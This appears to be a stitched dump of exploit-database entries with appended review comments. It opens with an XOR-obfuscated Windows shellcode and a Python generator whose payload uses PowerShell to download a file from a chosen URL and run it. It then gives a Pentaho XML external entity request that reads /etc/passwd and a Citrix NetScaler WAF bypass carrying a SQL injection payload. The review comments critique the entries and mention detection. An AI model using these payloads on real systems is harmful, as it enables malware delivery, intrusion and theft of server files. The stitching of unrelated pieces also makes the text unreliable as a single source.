unsigned char shellcode[]= "\x31\xc0\x50\x68\x41\x41\x65\x22\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb8\x34\x47\x0b\x4d\xbb\x5d\x69\x6e\x35\x31\xd8\x50\xb8\x43\x32\x10\x22\xbb\x79\x6e\x51\x4e\x31\xd8\x50\xb8\x60\x05\x42\x32\xbb\x49\x78\x79\x71\x31\xd8\x50\xb8\x0f\x1c\x2c\x14\xbb\x6a\x64\x49\x33\x31\xd8\x50\xb8\x07\x3e\x0b\x40\xbb\x46\x52\x62\x6e\x31\xd8\x50\xb8\x44\x0a\x78\x07\xbb\x63\x49\x42\x5b\x31\xd8\x50\xb8\x0f\x16\x4b\x0d\xbb\x6a\x31\x67\x2d\x31\xd8\x50\xb8\x18\x62\x5c\x1f\xbb\x61\x4c\x39\x67\x31\xd8\x50\xb8\x1b\x2d\x1e\x1f\xbb\x6b\x58\x6a\x6b\x31\xd8\x50\xb8\x45\x40\x41\x66\xbb\x3d\x78\x77\x49\x31\xd8\x50\xb8\x02\x1f\x4b\x45\xbb\x6d\x6b\x38\x6a\x31\xd8\x50\xb8\x24\x3e\x19\x32\xbb\x45\x4e\x6a\x5a\x31\xd8\x50\xb8\x00\x5e\x3a\x35\xbb\x6c\x73\x49\x5b\x31\xd8\x50\xb8\x1f\x37\x40\x24\xbb\x6d\x52\x32\x41\x31\xd8\x50\xb8\x2e\x35\x68\x31\xbb\x5a\x4c\x45\x41\x31\xd8\x50\xb8\x48\x1e\x1c\x15\xbb\x67\x6e\x69\x61\x31\xd8\x50\xb8\x26\x28\x0d\x5d\xbb\x4f\x45\x62\x33\x31\xd8\x50\xb8\x20\x57\x1d\x45\xbb\x47\x78\x63\x36\x31\xd8\x50\xb8\x04\x6a\x24\x3b\xbb\x77\x44\x4b\x49\x31\xd8\x50\xb8\x18\x0f\x0a\x32\xbb\x6c\x6e\x78\x47\x31\xd8\x50\xb8\x7d\x18\x3c\x27\xbb\x52\x6c\x5d\x55\x31\xd8\x50\xb8\x03\x44\x60\x60\xbb\x77\x34\x5a\x4f\x31\xd8\x50\xb8\x47\x6b\x1f\x20\xbb\x6f\x4c\x77\x54\x31\xd8\x50\xb8\x2a\x5e\x2b\x20\xbb\x6c\x37\x47\x45\x31\xd8\x50\xb8\x59\x07\x12\x0e\xbb\x35\x68\x73\x6a\x31\xd8\x50\xb8\x01\x59\x11\x2c\xbb\x45\x36\x66\x42\x31\xd8\x50\xb8\x22\x22\x4e\x5a\xbb\x4c\x56\x67\x74\x31\xd8\x50\xb8\x00\x37\x1b\x48\xbb\x43\x5b\x72\x2d\x31\xd8\x50\xb8\x4a\x1f\x22\x13\xbb\x64\x48\x47\x71\x31\xd8\x50\xb8\x6a\x23\x03\x18\xbb\x4a\x6d\x66\x6c\x31\xd8\x50\xb8\x2d\x54\x57\x1c\xbb\x47\x31\x34\x68\x31\xd8\x50\xb8\x4e\x15\x36\x5a\xbb\x39\x38\x79\x38\x31\xd8\x50\xb8\x59\x7f\x1f\x04\xbb\x79\x57\x51\x61\x31\xd8\x50\xb8\x47\x56\x1d\x2f\xbb\x65\x70\x3d\x54\x31\xd8\x50\xb8\x2c\x18\x08\x54\xbb\x4d\x76\x6c\x74\x31\xd8\x50\xb8\x5a\x34\x58\x1b\xbb\x39\x5b\x35\x76\x31\xd8\x50\xb8\x3f\x0f\x4b\x41\xbb\x53\x63\x6b
\x6c\x31\xd8\x50\xb8\x4a\x1e\x59\x0b\xbb\x38\x6d\x31\x6e\x31\xd8\x50\xb8\x49\x2b\x16\x2a\xbb\x39\x44\x61\x4f\x31\xd8\x50\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\x95\xe6\xb1\x77\xff\xd3\xbb\xcf\x2a\xae\x77\xff\xd3";
fprintf(stdout,"Length: %d\n\n",strlen(shellcode));
(*(void(*)()) shellcode)();
}
=======================================
C:\Users\Ali\Desktop>gcc shellcode.c -o shellcode.exe
C:\Users\Ali\Desktop>shellcode.exe
Length: 173
C:\Users\Ali\Desktop>
#notice : when program exit, you must wait 2-3 second , it will finish download and execute file after 2-3 second
'''
import random,binascii
chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz123456789=[]-'
p1 = '''xor eax,eax
push eax
'''
p2 = '''
mov eax,esp
mov ebx,0x01414141
shr ebx,0x08
shr ebx,0x08
shr ebx,0x08
push ebx
push eax
mov ebx,0x77b1e695
call ebx
mov ebx,0x77ae2acf
call ebx
'''
sen1 = str(raw_input('Enter url\nExample: http://z3r0d4y.com/file.exe \nEnter:'))
sen1 = sen1.rsplit()
sen1 = sen1[0]
sen2 = str(raw_input('Enter filename\nExample: D:\\file.exe\nEnter:'))
sen2 = sen2.rsplit()
sen2 = sen2[0]
sen = '''powershell -command "& { (New-Object Net.WebClient).DownloadFile('%s', '%s')};%s"''' %(sen1,sen2,sen2)
m = 0
for word in sen:
m += 1
m = m - 1
stack = ''
while(m>=0):
stack += sen[m]
m -= 1
stack = stack.encode('hex')
skip = 1
if len(stack) % 8 == 0:
skip = 0
if skip is 1:
stack = '00' + stack
if len(stack) % 8 == 0:
skip = 0
if skip is 1:
stack = '00' + stack
if len(stack) % 8 == 0:
skip = 0
if skip is 1:
stack = '00' + stack
if len(stack) % 8 == 0:
skip = 0
if len(stack) % 8 == 0:
zxzxzxz = 0
m = len(stack) / 8
c = 0
n = 0
z = 8
shf = open('shellcode.asm','w')
shf.write(p1)
shf.close()
shf = open('shellcode.asm','a')
while(c<m):
v = 'push 0x' + stack[n:z]
skip = 0
if '0x000000' in v:
skip = 1
q1 = v[13:]
v = 'push 0x' + q1 + '414141' + '\n' + 'pop eax\nshr eax,0x08\nshr eax,0x08\nshr eax,0x08\npush eax\n'
if '0x0000' in v:
skip = 1
q1 = v[11:]
v = 'push 0x' + q1 + '4141' + '\n' + 'pop eax\nshr eax,0x08\nshr eax,0x08\npush eax\n'
if '0x00' in v:
skip = 1
q1 = v[9:]
v = 'push 0x' + q1 + '41' + '\n' + 'pop eax\nshr eax,0x08\npush eax\n'
if skip is 1:
shf.write(v)
if skip is 0:
v = v.rsplit()
zzz = ''
for w in v:
if '0x' in w:
zzz = str(w)
s1 = binascii.b2a_hex(''.join(random.choice(chars) for i in range(4)))
s1 = '0x%s'%s1
data = "%x" % (int(zzz, 16) ^ int(s1, 16))
v = 'mov eax,0x%s\nmov ebx,%s\nxor eax,ebx\npush eax\n'%(data,s1)
shf.write(v)
n += 8
z += 8
c += 1
shf.write(p2)
shf.close()
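Review bot: `if skip is 1:` and `if skip is 0:` (used throughout the chunk loop) test identity rather than equality and only work because CPython caches small integers; use `==`. The script is also Python 2 only (`raw_input`, `stack.encode('hex')`, `len(stack) / 8` relied on as integer division) and the header should say so. More important for anyone reading this as documentation: `#WinExec => 0x77b1e695` and `#ExitProcess => 0x77ae2acf` are fixed addresses from the single "Windows 7 x64 ultimate" build named in the header, and `p2` writes them verbatim into the generated assembly as `mov ebx,0x77b1e695` / `call ebx`, so the output is tied to that one kernel32 image; the `#length: Dynamic` note should be paired with a note that the addresses are not. On the detection side, every payload this produces ends by launching `powershell -command "& { (New-Object Net.WebClient).DownloadFile(...)}"` followed by the dropped file, a command line worth alerting on when its parent is not an interactive shell.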

platforms/xml/webapps/36132.txt Executable file

@ -0,0 +1,92 @@
========================================================================
title: Pentaho User Console XML Injection Vulnerability
program: Pentaho BI User Console
vulnerable version: Pentaho < 4.5.0
homepage: http://www.pentaho.com/
Tested on: Linux x86/x86_64
found: Feb. 5 2014
Original Discovery by: Taylor Tippins
Exploit By: K.d Long kd@stonedcoder.org
========================================================================
Vendor description:
-------------------
The Pentaho Business Analytics suite manages Business Intelligence solutions, generate the reports,
data aggregation, and provides users access to analysis views.
Vulnerability description:
--------------------------
The dashboardXml parameter is vulnerable to XML external entity injection. The tag <!DOCTYPE foo
[<!ENTITY xxe8295c SYSTEM "file:///etc/passwd"> ]> was injected into the XML of the client's POST
request. This tag defines an external entity, xxe8295c, which references a file on the XML parser's
filesystem. This entity was then used within a data field in the XML document. The server's response
contains the contents of the specified file, indicating that the parser processed the injected
external entity.
By manipulating the POST request to “/pentaho/content/dashboards” it is possible to inject arbitrary
XML declarations- and tags. This request is triggered while a user is creating a customized dashboard.
Proof of concept:
-----------------
The following entity declaration would create a new XML entity with the content of the /etc/passwd
file which can be referenced in the following XML request content:
---cut here---
POST /pentaho/content/dashboards HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: https://example.com/pentaho/content/dashboards?command=new
Cookie: loginNewWindowChecked=false; JSESSIONID=61448378278C147D05BC95BAB4B63F19
Content-Length: 2458
Connection: keep-alive
command=templatecontents&dashboardXml=<!DOCTYPE foo [<!ENTITY xxe8295c SYSTEM "file:///etc/passwd">
]><dashboard>
<title>New Dashboard</title>
<heading>New Dashboard</heading>
<enableWidgetPrinting>false</enableWidgetPrinting>
<documentation>
<author>test</author>
<description></description>
<icon></icon>
</documentation>
<template-ref>xul/04-1-then-2.xul&xxe8295c;</template-ref>
<theme-ref>00-Onyx</theme-ref>
<layout>
<overlay xmlns:pho="http://www.pentaho.com">
<box id="Panel_1" pho:title="Untitled 1" type="titled-panel" flex="1" collapsed="false" />
<box id="Panel_2" pho:title="Untitled 2" type="titled-panel" flex="1" collapsed="false" />
<box id="Panel_3" pho:title="Untitled 3" type="titled-panel" flex="1" collapsed="false" />
<box id="Panel_4" pho:title="Untitled 4" type="titled-panel" flex="1" collapsed="false" />
<box id="Panel_5" pho:title="Untitled 5"/>
<box id="Panel_6" pho:title="Untitled 6"/>
<box id="Panel_7" pho:title="Untitled 7"/>
<box id="Panel_8" pho:title="Untitled 8"/>
<box id="Panel_9" pho:title="Untitled 9"/>
<box id="Panel_10" pho:title="Untitled 10"/>
<box id="titlebar" title="" height="23" hidden="false" width="0" type="pagetitle"
collapsed="false" /><box id="widget-area" type="scrollarea"/><box id="widget-area" flex="1"/><box
id="FilterPanel" title="" height="100" hidden="true" width="0" type="povpanel" collapsed="false"
/><box id="hbox1" type="layout"/><box id="hbox1" flex="1"/><box id="hbox2" type="layout"/><box
id="hbox2" flex="1"/></overlay>
</layout>
<parameters>
</parameters>
<widgetJavascript><![CDATA[[]]]></widgetJavascript>
</dashboard>
&type=html
---cut here---
Vulnerable versions:
--------------------
Pentaho User Console Release 4.5.0.GA.49857
Vendor contact timeline:
------------------------
02/16/2014: Vendor notified via email
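Review bot: the affected-version statements contradict each other: the header says "vulnerable version: Pentaho < 4.5.0" while the "Vulnerable versions" section lists "Pentaho User Console Release 4.5.0.GA.49857", so a reader cannot tell whether 4.5.0 itself is affected; pick one and state it in both places. The advisory also has no remediation section, and the vendor timeline stops at "02/16/2014: Vendor notified via email" with nothing after it, although the file is being published a year later; add the vendor response (or state that none was received) and the fix or workaround, which for an XML external entity issue is to disable DTD processing and external entity resolution in the parser that handles `dashboardXml`. Minor: the `Content-Length: 2458` header does not match the body shown, so note that the request is illustrative rather than a byte-exact capture.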

platforms/xml/webapps/36369.txt Executable file

@ -0,0 +1,112 @@
# Exploit Title: [Citrix Netscaler NS10.5 WAF Bypass via HTTP Header Pollution]
# Date: [Mar 13, 2015]
# Exploit Author: [BGA Security]
# Vendor Homepage: [http://www.citrix.com/]
# Version: [NS10.5]
# Tested on: [NetScaler NS10.5: Build 50.9.nc,]
Document Title:
============
Citrix Netscaler NS10.5 WAF Bypass via HTTP Header Pollution
Release Date:
===========
12 Mar 2015
Product & Service Introduction:
========================
Citrix NetScaler AppFirewall is a comprehensive application security solution that blocks known and unknown attacks targeting web and web services applications.
Abstract Advisory Information:
=======================
BGA Security Team discovered an HTTP Header Pollution
vulnerability in Citrix Netscaler NS10.5 (other versions may be vulnerable)
Vulnerability Disclosure Timeline:
=========================
2 Feb 2015 Bug reported to the vendor.
4 Feb 2015 Vendor returned with a case ID.
5 Feb 2015 Detailed info/config given.
12 Feb 2015 Asked about the case.
16 Feb 2015 Vendor returned "investigating ..."
6 Mar 2015 Asked about the case.
6 Mar 2015 Vendor has validated the issue.
12 Mar 2015 There aren't any fix addressing the issue.
Discovery Status:
=============
Published
Affected Product(s):
===============
Citrix Systems, Inc.
Product: Citrix Netscaler NS10.5 (other versions may be vulnerable)
Exploitation Technique:
==================
Remote, Unauthenticated
Severity Level:
===========
High
Technical Details & Description:
========================
It is possible to bypass Netscaler WAF using a method which may be called HTTP Header Pollution. The setup:
An Apache web server with default configuration on Windows (XAMPP).
A SOAP web service which has written in PHP and vulnerable to SQL injection.
Netscaler WAF with SQL injection rules.
First request: union select current_user,2# - Netscaler blocks it.
Second request: The same content and an additional HTTP header which is “Content-Type: application/octet-stream”. - It bypasses the WAF but the web server misinterprets it.
Third request: The same content and two additional HTTP headers which are “Content-Type: application/octet-stream” and “Content-Type: text/xml” in that order. The request is able to bypass the WAF and the web server runs it.
Proof of Concept (PoC):
==================
Proof of Concept
Request:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<string> union select current_user, 2#</string>
</soapenv:Body>
</soapenv:Envelope>
Response:
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<return xsi:type=“xsd:string”> Name: root@localhost </return>
</soap:Body>
</soap:Envelope>
Solution Fix & Patch:
================
12 Mar 2015 There aren't any fix addressing the issue.
Security Risk:
==========
The risk of the vulnerability above estimated as high.
Credits & Authors:
==============
BGA Bilgi Güvenli?i - Onur ALANBEL
Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
Domain: www.bga.com.tr
Social: twitter.com/bgasecurity
Contact: bilgi@bga.com.tr
Copyright © 2015 | BGA
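Review bot: the "Proof of Concept (PoC)" section shows only the SOAP envelope and response, without the request line or the two `Content-Type` headers that the "Technical Details & Description" section identifies as the whole point of the bypass (the third request, with `application/octet-stream` followed by `text/xml`), so the PoC as written does not demonstrate the issue the text describes; either include the full request headers already described above or say explicitly that the PoC is body-only. "Solution Fix & Patch" repeats the timeline entry "There aren't any fix addressing the issue" but gives operators no interim guidance; at minimum state that requests carrying more than one `Content-Type` header should be rejected or normalised at the WAF or reverse proxy before the application sees them. Style: "Tested on: [NetScaler NS10.5: Build 50.9.nc,]" has a trailing comma, and "BGA Bilgi Güvenli?i" in the credits has lost a character to encoding (the organisation name is Bilgi Güvenliği).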